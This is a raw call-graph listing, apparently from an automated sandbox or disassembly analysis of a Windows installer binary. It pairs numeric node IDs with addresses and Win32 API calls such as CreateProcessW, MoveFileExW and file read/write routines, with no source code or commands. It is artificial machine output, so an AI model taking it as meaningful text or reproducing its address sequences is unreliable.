3300 403ac0 3299->3300 3301 403acb 3299->3301 3453 406668 lstrcpynW 3300->3453 3454 406668 lstrcpynW 3301->3454 3306 403b19 CopyFileW 3310 403ad8 3306->3310 3307 403b63 3309 406428 36 API calls 3307->3309 3309->3273 3310->3307 3311 4066a5 17 API calls 3310->3311 3313 403b4d CloseHandle 3310->3313 3455 4066a5 3310->3455 3472 406428 MoveFileExW 3310->3472 3476 405c4b CreateProcessW 3310->3476 3311->3310 3313->3310 3315 4069e7 wsprintfW LoadLibraryExW 3314->3315 3315->3230 3318 406a51 3317->3318 3319 406a5b GetProcAddress 3317->3319 3320 4069c5 3 API calls 3318->3320 3321 403750 3319->3321 3322 406a57 3320->3322 3321->3234 3322->3319 3322->3321 3323->3240 3324->3242 3326 405f6a 3325->3326 3327 4037e8 CharNextW 3326->3327 3328 405f71 CharNextW 3326->3328 3327->3253 3328->3326 3486 4068ef 3329->3486 3331 403625 3331->3248 3332 40361b 3332->3331 3495 405f37 lstrlenW CharPrevW 3332->3495 3335 405c16 2 API calls 3336 403633 3335->3336 3498 406187 3336->3498 3502 406158 GetFileAttributesW CreateFileW 3339->3502 3341 403113 3368 403120 3341->3368 3503 406668 lstrcpynW 3341->3503 3343 403136 3504 405f83 lstrlenW 3343->3504 3347 403147 GetFileSize 3348 403241 3347->3348 3367 40315e 3347->3367 3509 40302e 3348->3509 3352 403286 GlobalAlloc 3355 40329d 3352->3355 3354 4032de 3356 40302e 32 API calls 3354->3356 3359 406187 2 API calls 3355->3359 3356->3368 3357 403267 3358 4035e2 ReadFile 3357->3358 3360 403272 3358->3360 3362 4032ae CreateFileW 3359->3362 3360->3352 3360->3368 3361 40302e 32 API calls 3361->3367 3363 4032e8 3362->3363 3362->3368 3524 4035f8 SetFilePointer 3363->3524 3365 4032f6 3525 403371 3365->3525 3367->3348 3367->3354 3367->3361 3367->3368 3540 4035e2 3367->3540 3368->3255 3370 406a35 5 API calls 3369->3370 3371 403d2b 3370->3371 3372 403d31 3371->3372 3373 403d43 3371->3373 3595 4065af wsprintfW 3372->3595 3596 406536 3373->3596 3377 403d92 lstrcatW 3378 403d41 3377->3378 3587 403fed 3378->3587 3379 406536 3 API calls 3379->3377 3382 40603f 18 API calls 3383 403dc4 3382->3383 3384 403e58 3383->3384 3386 406536 3 API calls 3383->3386 3385 40603f 18 API calls 3384->3385 3387 403e5e 3385->3387 3393 403df6 3386->3393 3388 403e6e LoadImageW 3387->3388 3389 4066a5 17 API calls 3387->3389 3390 403f14 3388->3390 3391 403e95 RegisterClassW 3388->3391 3389->3388 3395 40140b 2 API calls 3390->3395 3394 403ecb SystemParametersInfoW CreateWindowExW 3391->3394 3424 403f1e 3391->3424 3392 403e17 lstrlenW 3397 403e25 lstrcmpiW 3392->3397 3398 403e4b 3392->3398 3393->3384 3393->3392 3396 405f64 CharNextW 3393->3396 3394->3390 3399 403f1a 3395->3399 3400 403e14 3396->3400 3397->3398 3401 403e35 GetFileAttributesW 3397->3401 3402 405f37 3 API calls 3398->3402 3404 403fed 18 API calls 3399->3404 3399->3424 3400->3392 3403 403e41 3401->3403 3405 403e51 3402->3405 3403->3398 3406 405f83 2 API calls 3403->3406 3407 403f2b 3404->3407 3601 406668 lstrcpynW 3405->3601 3406->3398 3409 403f37 ShowWindow 3407->3409 3410 403fba 3407->3410 3411 4069c5 3 API calls 3409->3411 3602 40579d OleInitialize 3410->3602 3413 403f4f 3411->3413 3415 403f5d GetClassInfoW 3413->3415 3418 4069c5 3 API calls 3413->3418 3414 403fc0 3416 403fc4 3414->3416 3417 403fdc 3414->3417 3420 403f71 GetClassInfoW RegisterClassW 3415->3420 3421 403f87 DialogBoxParamW 3415->3421 3422 40140b 2 API calls 3416->3422 3416->3424 3419 40140b 2 API calls 3417->3419 3418->3415 3419->3424 3420->3421 3423 40140b 2 API calls 3421->3423 3422->3424 3423->3424 3424->3273 3425->3246 3624 406668 lstrcpynW 3426->3624 3428 406050 3625 405fe2 CharNextW CharNextW 3428->3625 3431 403a27 3431->3259 3440 406668 lstrcpynW 3431->3440 3432 4068ef 5 API calls 3438 406066 3432->3438 3433 406097 lstrlenW 3434 4060a2 3433->3434 3433->3438 3435 405f37 3 API calls 3434->3435 3437 4060a7 GetFileAttributesW 3435->3437 3437->3431 3438->3431 3438->3433 3439 405f83 2 API calls 3438->3439 3631 40699e FindFirstFileW 3438->3631 3439->3433 3440->3294 3441->3261 3443 406a35 5 API calls 3442->3443 3444 403a61 lstrcatW 3443->3444 3444->3288 3444->3289 3446 403aa7 3445->3446 3447 405bea GetLastError 3445->3447 3446->3299 3447->3446 3448 405bf9 SetFileSecurityW 3447->3448 3448->3446 3449 405c0f GetLastError 3448->3449 3449->3446 3451 405c2a GetLastError 3450->3451 3452 405c26 3450->3452 3451->3452 3452->3299 3453->3301 3454->3310 3459 4066b2 3455->3459 3456 4068d5 3457 403b0d DeleteFileW 3456->3457 3636 406668 lstrcpynW 3456->3636 3457->3306 3457->3310 3459->3456 3460 4068a3 lstrlenW 3459->3460 3461 4067ba GetSystemDirectoryW 3459->3461 3464 406536 3 API calls 3459->3464 3465 4066a5 10 API calls 3459->3465 3466 4067cd GetWindowsDirectoryW 3459->3466 3467 406844 lstrcatW 3459->3467 3468 4066a5 10 API calls 3459->3468 3469 4068ef 5 API calls 3459->3469 3470 4067fc SHGetSpecialFolderLocation 3459->3470 3634 4065af wsprintfW 3459->3634 3635 406668 lstrcpynW 3459->3635 3460->3459 3461->3459 3464->3459 3465->3460 3466->3459 3467->3459 3468->3459 3469->3459 3470->3459 3471 406814 SHGetPathFromIDListW CoTaskMemFree 3470->3471 3471->3459 3473 406449 3472->3473 3474 40643c 3472->3474 3473->3310 3637 4062ae 3474->3637 3477 405c8a 3476->3477 3478 405c7e CloseHandle 3476->3478 3477->3310 3478->3477 3482 405cdd 3479->3482 3480 403b89 ExitProcess 3481 405cf1 MessageBoxIndirectW 3481->3480 3482->3480 3482->3481 3484 401389 2 API calls 3483->3484 3485 401420 3484->3485 3485->3266 3487 4068fc 3486->3487 3489 406972 3487->3489 3490 406965 CharNextW 3487->3490 3492 405f64 CharNextW 3487->3492 3493 406951 CharNextW 3487->3493 3494 406960 CharNextW 3487->3494 3488 406977 CharPrevW 3488->3489 3489->3488 3491 406998 3489->3491 3490->3487 3490->3489 3491->3332 3492->3487 3493->3487 3494->3490 3496 405f53 lstrcatW 3495->3496 3497 40362d 3495->3497 3496->3497 3497->3335 3499 406194 GetTickCount GetTempFileNameW 3498->3499 3500 40363e 3499->3500 3501 4061ca 3499->3501 3500->3248 3501->3499 3501->3500 3502->3341 3503->3343 3505 405f91 3504->3505 3506 40313c 3505->3506 3507 405f97 CharPrevW 3505->3507 3508 406668 lstrcpynW 3506->3508 3507->3505 3507->3506 3508->3347 3510 403057 3509->3510 3511 40303f 3509->3511 3513 403067 GetTickCount 3510->3513 3514 40305f 3510->3514 3512 403048 DestroyWindow 3511->3512 3517 40304f 3511->3517 3512->3517 3516 403075 3513->3516 3513->3517 3544 406a71 3514->3544 3518 4030aa CreateDialogParamW ShowWindow 3516->3518 3519 40307d 3516->3519 3517->3352 3517->3368 3543 4035f8 SetFilePointer 3517->3543 3518->3517 3519->3517 3548 403012 3519->3548 3521 40308b wsprintfW 3551 4056ca 3521->3551 3524->3365 3526 403380 SetFilePointer 3525->3526 3527 40339c 3525->3527 3526->3527 3562 403479 GetTickCount 3527->3562 3532 403479 42 API calls 3533 4033d3 3532->3533 3534 40343f ReadFile 3533->3534 3538 4033e2 3533->3538 3539 403439 3533->3539 3534->3539 3536 4061db ReadFile 3536->3538 3538->3536 3538->3539 3577 40620a WriteFile 3538->3577 3539->3368 3541 4061db ReadFile 3540->3541 3542 4035f5 3541->3542 3542->3367 3543->3357 3545 406a8e PeekMessageW 3544->3545 3546 406a84 DispatchMessageW 3545->3546 3547 406a9e 3545->3547 3546->3545 3547->3517 3549 403021 3548->3549 3550 403023 MulDiv 3548->3550 3549->3550 3550->3521 3552 4056e5 3551->3552 3553 4030a8 3551->3553 3554 405701 lstrlenW 3552->3554 3555 4066a5 17 API calls 3552->3555 3553->3517 3556 40572a 3554->3556 3557 40570f lstrlenW 3554->3557 3555->3554 3558 405730 SetWindowTextW 3556->3558 3559 40573d 3556->3559 3557->3553 3560 405721 lstrcatW 3557->3560 3558->3559 3559->3553 3561 405743 SendMessageW SendMessageW SendMessageW 3559->3561 3560->3556 3561->3553 3563 4035d1 3562->3563 3564 4034a7 3562->3564 3565 40302e 32 API calls 3563->3565 3579 4035f8 SetFilePointer 3564->3579 3572 4033a3 3565->3572 3567 4034b2 SetFilePointer 3571 4034d7 3567->3571 3568 4035e2 ReadFile 3568->3571 3570 40302e 32 API calls 3570->3571 3571->3568 3571->3570 3571->3572 3573 40620a WriteFile 3571->3573 3574 4035b2 SetFilePointer 3571->3574 3580 406bb0 3571->3580 3572->3539 3575 4061db ReadFile 3572->3575 3573->3571 3574->3563 3576 4033bc 3575->3576 3576->3532 3576->3539 3578 406228 3577->3578 3578->3538 3579->3567 3581 406bd5 3580->3581 3582 406bdd 3580->3582 3581->3571 3582->3581 3583 406c64 GlobalFree 3582->3583 3584 406c6d GlobalAlloc 3582->3584 3585 406ce4 GlobalAlloc 3582->3585 3586 406cdb GlobalFree 3582->3586 3583->3584 3584->3581 3584->3582 3585->3581 3585->3582 3586->3585 3588 404001 3587->3588 3609 4065af wsprintfW 3588->3609 3590 404072 3610 4040a6 3590->3610 3592 403da2 3592->3382 3593 404077 3593->3592 3594 4066a5 17 API calls 3593->3594 3594->3593 3595->3378 3613 4064d5 3596->3613 3599 403d73 3599->3377 3599->3379 3600 40656a RegQueryValueExW RegCloseKey 3600->3599 3601->3384 3617 404610 3602->3617 3604 4057e7 3605 404610 SendMessageW 3604->3605 3607 4057f9 OleUninitialize 3605->3607 3606 4057c0 3606->3604 3620 401389 3606->3620 3607->3414 3609->3590 3611 4066a5 17 API calls 3610->3611 3612 4040b4 SetWindowTextW 3611->3612 3612->3593 3614 4064e4 3613->3614 3615 4064e8 3614->3615 3616 4064ed RegOpenKeyExW 3614->3616 3615->3599 3615->3600 3616->3615 3618 404628 3617->3618 3619 404619 SendMessageW 3617->3619 3618->3606 3619->3618 3622 401390 3620->3622 3621 4013fe 3621->3606 3622->3621 3623 4013cb MulDiv SendMessageW 3622->3623 3623->3622 3624->3428 3626 405fff 3625->3626 3628 406011 3625->3628 3627 40600c CharNextW 3626->3627 3626->3628 3630 406035 3627->3630 3629 405f64 CharNextW 3628->3629 3628->3630 3629->3628 3630->3431 3630->3432 3632 4069b4 FindClose 3631->3632 3633 4069bf 3631->3633 3632->3633 3633->3438 3634->3459 3635->3459 3636->3457 3638 406304 GetShortPathNameW 3637->3638 3639 4062de 3637->3639 3640 406423 3638->3640 3641 406319 3638->3641 3664 406158 GetFileAttributesW CreateFileW 3639->3664 3640->3473 3641->3640 3643 406321 wsprintfA 3641->3643 3645 4066a5 17 API calls 3643->3645 3644 4062e8 CloseHandle GetShortPathNameW 3644->3640 3646 4062fc 3644->3646 3647 406349 3645->3647 3646->3638 3646->3640 3665 406158 GetFileAttributesW CreateFileW 3647->3665 3649 406356 3649->3640 3650 406365 GetFileSize GlobalAlloc 3649->3650 3651 406387 3650->3651 3652 40641c CloseHandle 3650->3652 3653 4061db ReadFile 3651->3653 3652->3640 3654 40638f 3653->3654 3654->3652 3666 4060bd lstrlenA 3654->3666 3657 4063a6 lstrcpyA 3660 4063c8 3657->3660 3658 4063ba 3659 4060bd 4 API calls 3658->3659 3659->3660 3661 4063ff SetFilePointer 3660->3661 3662 40620a WriteFile 3661->3662 3663 406415 GlobalFree 3662->3663 3663->3652 3664->3644 3665->3649 3667 4060fe lstrlenA 3666->3667 3668 406106 3667->3668 3669 4060d7 lstrcmpiA 3667->3669 3668->3657 3668->3658 3669->3668 3670 4060f5 CharNextA 3669->3670 3670->3667 3671 401941 3672 401943 3671->3672 3677 402da6 3672->3677 3678 402db2 3677->3678 3679 4066a5 17 API calls 3678->3679 3680 402dd3 3679->3680 3681 401948 3680->3681 3682 4068ef 5 API calls 3680->3682 3683 405d74 3681->3683 3682->3681 3684 40603f 18 API calls 3683->3684 3685 405d94 3684->3685 3686 405d9c DeleteFileW 3685->3686 3687 405db3 3685->3687 3691 401951 3686->3691 3688 405ed3 3687->3688 3719 406668 lstrcpynW 3687->3719 3688->3691 3695 40699e 2 API calls 3688->3695 3690 405dd9 3692 405dec 3690->3692 3693 405ddf lstrcatW 3690->3693 3694 405f83 2 API calls 3692->3694 3696 405df2 3693->3696 3694->3696 3698 405ef8 3695->3698 3697 405e02 lstrcatW 3696->3697 3699 405e0d lstrlenW FindFirstFileW 3696->3699 3697->3699 3698->3691 3700 405f37 3 API calls 3698->3700 3699->3688 3717 405e2f 3699->3717 3701 405f02 3700->3701 3703 405d2c 5 API calls 3701->3703 3702 405eb6 FindNextFileW 3706 405ecc FindClose 3702->3706 3702->3717 3705 405f0e 3703->3705 3707 405f12 3705->3707 3708 405f28 3705->3708 3706->3688 3707->3691 3711 4056ca 24 API calls 3707->3711 3710 4056ca 24 API calls 3708->3710 3710->3691 3713 405f1f 3711->3713 3712 405d74 60 API calls 3712->3717 3715 406428 36 API calls 3713->3715 3714 4056ca 24 API calls 3714->3702 3715->3691 3716 4056ca 24 API calls 3716->3717 3717->3702 3717->3712 3717->3714 3717->3716 3718 406428 36 API calls 3717->3718 3720 406668 lstrcpynW 3717->3720 3721 405d2c 3717->3721 3718->3717 3719->3690 3720->3717 3729 406133 GetFileAttributesW 3721->3729 3724 405d47 RemoveDirectoryW 3727 405d55 3724->3727 3725 405d4f DeleteFileW 3725->3727 3726 405d59 3726->3717 3727->3726 3728 405d65 SetFileAttributesW 3727->3728 3728->3726 3730 405d38 3729->3730 3731 406145 SetFileAttributesW 3729->3731 3730->3724 3730->3725 3730->3726 3731->3730 3732 4015c1 3733 402da6 17 API calls 3732->3733 3734 4015c8 3733->3734 3735 405fe2 4 API calls 3734->3735 3747 4015d1 3735->3747 3736 401631 3737 401663 3736->3737 3738 401636 3736->3738 3742 401423 24 API calls 3737->3742 3751 401423 3738->3751 3739 405f64 CharNextW 3739->3747 3748 40165b 3742->3748 3744 405c16 2 API calls 3744->3747 3745 405c33 5 API calls 3745->3747 3746 40164a SetCurrentDirectoryW 3746->3748 3747->3736 3747->3739 3747->3744 3747->3745 3749 401617 GetFileAttributesW 3747->3749 3750 405b99 4 API calls 3747->3750 3749->3747 3750->3747 3752 4056ca 24 API calls 3751->3752 3753 401431 3752->3753 3754 406668 lstrcpynW 3753->3754 3754->3746 3935 401c43 3957 402d84 3935->3957 3937 401c4a 3938 402d84 17 API calls 3937->3938 3939 401c57 3938->3939 3940 402da6 17 API calls 3939->3940 3941 401c6c 3939->3941 3940->3941 3942 401c7c 3941->3942 3943 402da6 17 API calls 3941->3943 3944 401cd3 3942->3944 3945 401c87 3942->3945 3943->3942 3947 402da6 17 API calls 3944->3947 3946 402d84 17 API calls 3945->3946 3949 401c8c 3946->3949 3948 401cd8 3947->3948 3950 402da6 17 API calls 3948->3950 3951 402d84 17 API calls 3949->3951 3952 401ce1 FindWindowExW 3950->3952 3953 401c98 3951->3953 3956 401d03 3952->3956 3954 401cc3 SendMessageW 3953->3954 3955 401ca5 SendMessageTimeoutW 3953->3955 3954->3956 3955->3956 3958 4066a5 17 API calls 3957->3958 3959 402d99 3958->3959 3959->3937 3967 4028c4 3968 4028ca 3967->3968 3969 4028d2 FindClose 3968->3969 3970 402c2a 3968->3970 3969->3970 3776 4040c5 3777 4040dd 3776->3777 3778 40423e 3776->3778 3777->3778 3779 4040e9 3777->3779 3780 40424f GetDlgItem GetDlgItem 3778->3780 3785 40428f 3778->3785 3782 4040f4 SetWindowPos 3779->3782 3783 404107 3779->3783 3852 4045c4 3780->3852 3781 4042e9 3786 404610 SendMessageW 3781->3786 3794 404239 3781->3794 3782->3783 3787 404110 ShowWindow 3783->3787 3788 404152 3783->3788 3785->3781 3793 401389 2 API calls 3785->3793 3817 4042fb 3786->3817 3795 404130 GetWindowLongW 3787->3795 3796 40422b 3787->3796 3790 404171 3788->3790 3791 40415a DestroyWindow 3788->3791 3789 404279 KiUserCallbackDispatcher 3792 40140b 2 API calls 3789->3792 3798 404176 SetWindowLongW 3790->3798 3799 404187 3790->3799 3797 40456e 3791->3797 3792->3785 3800 4042c1 3793->3800 3795->3796 3802 404149 ShowWindow 3795->3802 3858 40462b 3796->3858 3797->3794 3809 40457e ShowWindow 3797->3809 3798->3794 3799->3796 3803 404193 GetDlgItem 3799->3803 3800->3781 3804 4042c5 SendMessageW 3800->3804 3802->3788 3807 4041c1 3803->3807 3808 4041a4 SendMessageW IsWindowEnabled 3803->3808 3804->3794 3805 40140b 2 API calls 3805->3817 3806 40454f DestroyWindow EndDialog 3806->3797 3811 4041ce 3807->3811 3814 404215 SendMessageW 3807->3814 3815 4041e1 3807->3815 3823 4041c6 3807->3823 3808->3794 3808->3807 3809->3794 3810 4066a5 17 API calls 3810->3817 3811->3814 3811->3823 3813 4045c4 18 API calls 3813->3817 3814->3796 3818 4041e9 3815->3818 3819 4041fe 3815->3819 3816 4041fc 3816->3796 3817->3805 3817->3806 3817->3810 3817->3813 3824 4045c4 18 API calls 3817->3824 3821 40140b 2 API calls 3818->3821 3820 40140b 2 API calls 3819->3820 3822 404205 3820->3822 3821->3823 3822->3796 3822->3823 3855 40459d 3823->3855 3825 404376 GetDlgItem 3824->3825 3826 404393 ShowWindow EnableWindow 3825->3826 3827 40438b 3825->3827 3872 4045e6 EnableWindow 3826->3872 3827->3826 3829 4043bd EnableWindow 3834 4043d1 3829->3834 3830 4043d6 GetSystemMenu EnableMenuItem SendMessageW 3831 404406 SendMessageW 3830->3831 3830->3834 3831->3834 3833 4040a6 18 API calls 3833->3834 3834->3830 3834->3833 3873 4045f9 SendMessageW 3834->3873 3874 406668 lstrcpynW 3834->3874 3836 404435 lstrlenW 3837 4066a5 17 API calls 3836->3837 3838 40444b SetWindowTextW 3837->3838 3839 401389 2 API calls 3838->3839 3840 40445c 3839->3840 3840->3794 3840->3817 3841 40448f DestroyWindow 3840->3841 3843 40448a 3840->3843 3841->3797 3842 4044a9 CreateDialogParamW 3841->3842 3842->3797 3844 4044dc 3842->3844 3843->3794 3845 4045c4 18 API calls 3844->3845 3846 4044e7 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3845->3846 3847 401389 2 API calls 3846->3847 3848 40452d 3847->3848 3848->3794 3849 404535 ShowWindow 3848->3849 3850 404610 SendMessageW 3849->3850 3851 40454d 3850->3851 3851->3797 3853 4066a5 17 API calls 3852->3853 3854 4045cf SetDlgItemTextW 3853->3854 3854->3789 3856 4045a4 3855->3856 3857 4045aa SendMessageW 3855->3857 3856->3857 3857->3816 3859 4046ee 3858->3859 3860 404643 GetWindowLongW 3858->3860 3859->3794 3860->3859 3861 404658 3860->3861 3861->3859 3862 404685 GetSysColor 3861->3862 3863 404688 3861->3863 3862->3863 3864 404698 SetBkMode 3863->3864 3865 40468e SetTextColor 3863->3865 3866 4046b0 GetSysColor 3864->3866 3867 4046b6 3864->3867 3865->3864 3866->3867 3868 4046c7 3867->3868 3869 4046bd SetBkColor 3867->3869 3868->3859 3870 4046e1 CreateBrushIndirect 3868->3870 3871 4046da DeleteObject 3868->3871 3869->3868 3870->3859 3871->3870 3872->3829 3873->3834 3874->3836 3974 4016cc 3975 402da6 17 API calls 3974->3975 3976 4016d2 GetFullPathNameW 3975->3976 3977 4016ec 3976->3977 3983 40170e 3976->3983 3979 40699e 2 API calls 3977->3979 3977->3983 3978 401723 GetShortPathNameW 3980 402c2a 3978->3980 3981 4016fe 3979->3981 3981->3983 3984 406668 lstrcpynW 3981->3984 3983->3978 3983->3980 3984->3983 3985 401e4e GetDC 3986 402d84 17 API calls 3985->3986 3987 401e60 GetDeviceCaps MulDiv ReleaseDC 3986->3987 3988 402d84 17 API calls 3987->3988 3989 401e91 3988->3989 3990 4066a5 17 API calls 3989->3990 3991 401ece CreateFontIndirectW 3990->3991 3992 402638 3991->3992 3992->3992 3993 402950 3994 402da6 17 API calls 3993->3994 3996 40295c 3994->3996 3995 402972 3998 406133 2 API calls 3995->3998 3996->3995 3997 402da6 17 API calls 3996->3997 3997->3995 3999 402978 3998->3999 4021 406158 GetFileAttributesW CreateFileW 3999->4021 4001 402985 4002 402a3b 4001->4002 4003 4029a0 GlobalAlloc 4001->4003 4004 402a23 4001->4004 4005 402a42 DeleteFileW 4002->4005 4006 402a55 4002->4006 4003->4004 4007 4029b9 4003->4007 4008 403371 44 API calls 4004->4008 4005->4006 4022 4035f8 SetFilePointer 4007->4022 4010 402a30 CloseHandle 4008->4010 4010->4002 4011 4029bf 4012 4035e2 ReadFile 4011->4012 4013 4029c8 GlobalAlloc 4012->4013 4014 4029d8 4013->4014 4015 402a0c 4013->4015 4016 403371 44 API calls 4014->4016 4017 40620a WriteFile 4015->4017 4020 4029e5 4016->4020 4018 402a18 GlobalFree 4017->4018 4018->4004 4019 402a03 GlobalFree 4019->4015 4020->4019 4021->4001 4022->4011 4030 403cd5 4031 403ce0 4030->4031 4032 403ce4 4031->4032 4033 403ce7 GlobalAlloc 4031->4033 4033->4032 4034 401956 4035 402da6 17 API calls 4034->4035 4036 40195d lstrlenW 4035->4036 4037 402638 4036->4037 4038 4014d7 4039 402d84 17 API calls 4038->4039 4040 4014dd Sleep 4039->4040 4042 402c2a 4040->4042 4043 4020d8 4044 4020ea 4043->4044 4054 40219c 4043->4054 4045 402da6 17 API calls 4044->4045 4046 4020f1 4045->4046 4048 402da6 17 API calls 4046->4048 4047 401423 24 API calls 4050 4022f6 4047->4050 4049 4020fa 4048->4049 4051 402110 LoadLibraryExW 4049->4051 4052 402102 GetModuleHandleW 4049->4052 4053 402121 4051->4053 4051->4054 4052->4051 4052->4053 4063 406aa4 4053->4063 4054->4047 4057 402132 4060 401423 24 API calls 4057->4060 4061 402142 4057->4061 4058 40216b 4059 4056ca 24 API calls 4058->4059 4059->4061 4060->4061 4061->4050 4062 40218e FreeLibrary 4061->4062 4062->4050 4068 40668a WideCharToMultiByte 4063->4068 4065 406ac1 4066 406ac8 GetProcAddress 4065->4066 4067 40212c 4065->4067 4066->4067 4067->4057 4067->4058 4068->4065 4069 402b59 4070 402b60 4069->4070 4071 402bab 4069->4071 4073 402ba9 4070->4073 4075 402d84 17 API calls 4070->4075 4072 406a35 5 API calls 4071->4072 4074 402bb2 4072->4074 4076 402da6 17 API calls 4074->4076 4077 402b6e 4075->4077 4078 402bbb 4076->4078 4079 402d84 17 API calls 4077->4079 4078->4073 4080 402bbf IIDFromString 4078->4080 4082 402b7a 4079->4082 4080->4073 4081 402bce 4080->4081 4081->4073 4087 406668 lstrcpynW 4081->4087 4086 4065af wsprintfW 4082->4086 4085 402beb CoTaskMemFree 4085->4073 4086->4073 4087->4085 4088 402a5b 4089 402d84 17 API calls 4088->4089 4090 402a61 4089->4090 4091 402aa4 4090->4091 4092 402a88 4090->4092 4097 40292e 4090->4097 4094 402abe 4091->4094 4095 402aae 4091->4095 4093 402a8d 4092->4093 4101 402a9e 4092->4101 4102 406668 lstrcpynW 4093->4102 4096 4066a5 17 API calls 4094->4096 4098 402d84 17 API calls 4095->4098 4096->4101 4098->4101 4101->4097 4103 4065af wsprintfW 4101->4103 4102->4097 4103->4097 3888 40175c 3889 402da6 17 API calls 3888->3889 3890 401763 3889->3890 3891 406187 2 API calls 3890->3891 3892 40176a 3891->3892 3893 406187 2 API calls 3892->3893 3893->3892 4104 401d5d 4105 402d84 17 API calls 4104->4105 4106 401d6e SetWindowLongW 4105->4106 4107 402c2a 4106->4107 4108 4028de 4109 4028e6 4108->4109 4110 4028ea FindNextFileW 4109->4110 4112 4028fc 4109->4112 4111 402943 4110->4111 4110->4112 4114 406668 lstrcpynW 4111->4114 4114->4112 4115 406d5f 4121 406be3 4115->4121 4116 40754e 4117 406c64 GlobalFree 4118 406c6d GlobalAlloc 4117->4118 4118->4116 4118->4121 4119 406ce4 GlobalAlloc 4119->4116 4119->4121 4120 406cdb GlobalFree 4120->4119 4121->4116 4121->4117 4121->4118 4121->4119 4121->4120 4122 401563 4123 402ba4 4122->4123 4126 4065af wsprintfW 4123->4126 4125 402ba9 4126->4125 4127 401968 4128 402d84 17 API calls 4127->4128 4129 40196f 4128->4129 4130 402d84 17 API calls 4129->4130 4131 40197c 4130->4131 4132 402da6 17 API calls 4131->4132 4133 401993 lstrlenW 4132->4133 4135 4019a4 4133->4135 4134 4019e5 4135->4134 4139 406668 lstrcpynW 4135->4139 4137 4019d5 4137->4134 4138 4019da lstrlenW 4137->4138 4138->4134 4139->4137 4147 40166a 4148 402da6 17 API calls 4147->4148 4149 401670 4148->4149 4150 40699e 2 API calls 4149->4150 4151 401676 4150->4151 4152 402aeb 4153 402d84 17 API calls 4152->4153 4154 402af1 4153->4154 4155 4066a5 17 API calls 4154->4155 4156 40292e 4154->4156 4155->4156 4157 4026ec 4158 402d84 17 API calls 4157->4158 4159 4026fb 4158->4159 4160 402745 ReadFile 4159->4160 4161 4061db ReadFile 4159->4161 4163 402785 MultiByteToWideChar 4159->4163 4164 40283a 4159->4164 4166 4027ab SetFilePointer MultiByteToWideChar 4159->4166 4167 40284b 4159->4167 4169 402838 4159->4169 4170 406239 SetFilePointer 4159->4170 4160->4159 4160->4169 4161->4159 4163->4159 4179 4065af wsprintfW 4164->4179 4166->4159 4168 40286c SetFilePointer 4167->4168 4167->4169 4168->4169 4171 406255 4170->4171 4174 40626d 4170->4174 4172 4061db ReadFile 4171->4172 4173 406261 4172->4173 4173->4174 4175 406276 SetFilePointer 4173->4175 4176 40629e SetFilePointer 4173->4176 4174->4159 4175->4176 4177 406281 4175->4177 4176->4174 4178 40620a WriteFile 4177->4178 4178->4174 4179->4169 4180 404a6e 4181 404aa4 4180->4181 4182 404a7e 4180->4182 4184 40462b 8 API calls 4181->4184 4183 4045c4 18 API calls 4182->4183 4185 404a8b SetDlgItemTextW 4183->4185 4186 404ab0 4184->4186 4185->4181 3894 40176f 3895 402da6 17 API calls 3894->3895 3896 401776 3895->3896 3897 401796 3896->3897 3898 40179e 3896->3898 3933 406668 lstrcpynW 3897->3933 3934 406668 lstrcpynW 3898->3934 3901 40179c 3905 4068ef 5 API calls 3901->3905 3902 4017a9 3903 405f37 3 API calls 3902->3903 3904 4017af lstrcatW 3903->3904 3904->3901 3925 4017bb 3905->3925 3906 40699e 2 API calls 3906->3925 3907 406133 2 API calls 3907->3925 3909 4017cd CompareFileTime 3909->3925 3910 40188d 3912 4056ca 24 API calls 3910->3912 3911 401864 3913 4056ca 24 API calls 3911->3913 3921 401879 3911->3921 3914 401897 3912->3914 3913->3921 3915 403371 44 API calls 3914->3915 3916 4018aa 3915->3916 3917 4018be SetFileTime 3916->3917 3918 4018d0 FindCloseChangeNotification 3916->3918 3917->3918 3920 4018e1 3918->3920 3918->3921 3919 4066a5 17 API calls 3919->3925 3923 4018e6 3920->3923 3924 4018f9 3920->3924 3922 406668 lstrcpynW 3922->3925 3926 4066a5 17 API calls 3923->3926 3927 4066a5 17 API calls 3924->3927 3925->3906 3925->3907 3925->3909 3925->3910 3925->3911 3925->3919 3925->3922 3928 405cc8 MessageBoxIndirectW 3925->3928 3932 406158 GetFileAttributesW CreateFileW 3925->3932 3929 4018ee lstrcatW 3926->3929 3930 401901 3927->3930 3928->3925 3929->3930 3931 405cc8 MessageBoxIndirectW 3930->3931 3931->3921 3932->3925 3933->3901 3934->3902 4187 401a72 4188 402d84 17 API calls 4187->4188 4189 401a7b 4188->4189 4190 402d84 17 API calls 4189->4190 4191 401a20 4190->4191 4192 401573 4193 401583 ShowWindow 4192->4193 4194 40158c 4192->4194 4193->4194 4195 402c2a 4194->4195 4196 40159a ShowWindow 4194->4196 4196->4195 4197 4023f4 4198 402da6 17 API calls 4197->4198 4199 402403 4198->4199 4200 402da6 17 API calls 4199->4200 4201 40240c 4200->4201 4202 402da6 17 API calls 4201->4202 4203 402416 GetPrivateProfileStringW 4202->4203 4204 4014f5 SetForegroundWindow 4205 402c2a 4204->4205 4206 401ff6 4207 402da6 17 API calls 4206->4207 4208 401ffd 4207->4208 4209 40699e 2 API calls 4208->4209 4210 402003 4209->4210 4212 402014 4210->4212 4213 4065af wsprintfW 4210->4213 4213->4212 4214 401b77 4215 402da6 17 API calls 4214->4215 4216 401b7e 4215->4216 4217 402d84 17 API calls 4216->4217 4218 401b87 wsprintfW 4217->4218 4219 402c2a 4218->4219 4220 4046fa lstrcpynW lstrlenW 4221 40167b 4222 402da6 17 API calls 4221->4222 4223 401682 4222->4223 4224 402da6 17 API calls 4223->4224 4225 40168b 4224->4225 4226 402da6 17 API calls 4225->4226 4227 401694 MoveFileW 4226->4227 4228 4016a0 4227->4228 4229 4016a7 4227->4229 4231 401423 24 API calls 4228->4231 4230 40699e 2 API calls 4229->4230 4233 4022f6 4229->4233 4232 4016b6 4230->4232 4231->4233 4232->4233 4234 406428 36 API calls 4232->4234 4234->4228 4242 4019ff 4243 402da6 17 API calls 4242->4243 4244 401a06 4243->4244 4245 402da6 17 API calls 4244->4245 4246 401a0f 4245->4246 4247 401a16 lstrcmpiW 4246->4247 4248 401a28 lstrcmpW 4246->4248 4249 401a1c 4247->4249 4248->4249 4250 4022ff 4251 402da6 17 API calls 4250->4251 4252 402305 4251->4252 4253 402da6 17 API calls 4252->4253 4254 40230e 4253->4254 4255 402da6 17 API calls 4254->4255 4256 402317 4255->4256 4257 40699e 2 API calls 4256->4257 4258 402320 4257->4258 4259 402331 lstrlenW lstrlenW 4258->4259 4260 402324 4258->4260 4262 4056ca 24 API calls 4259->4262 4261 4056ca 24 API calls 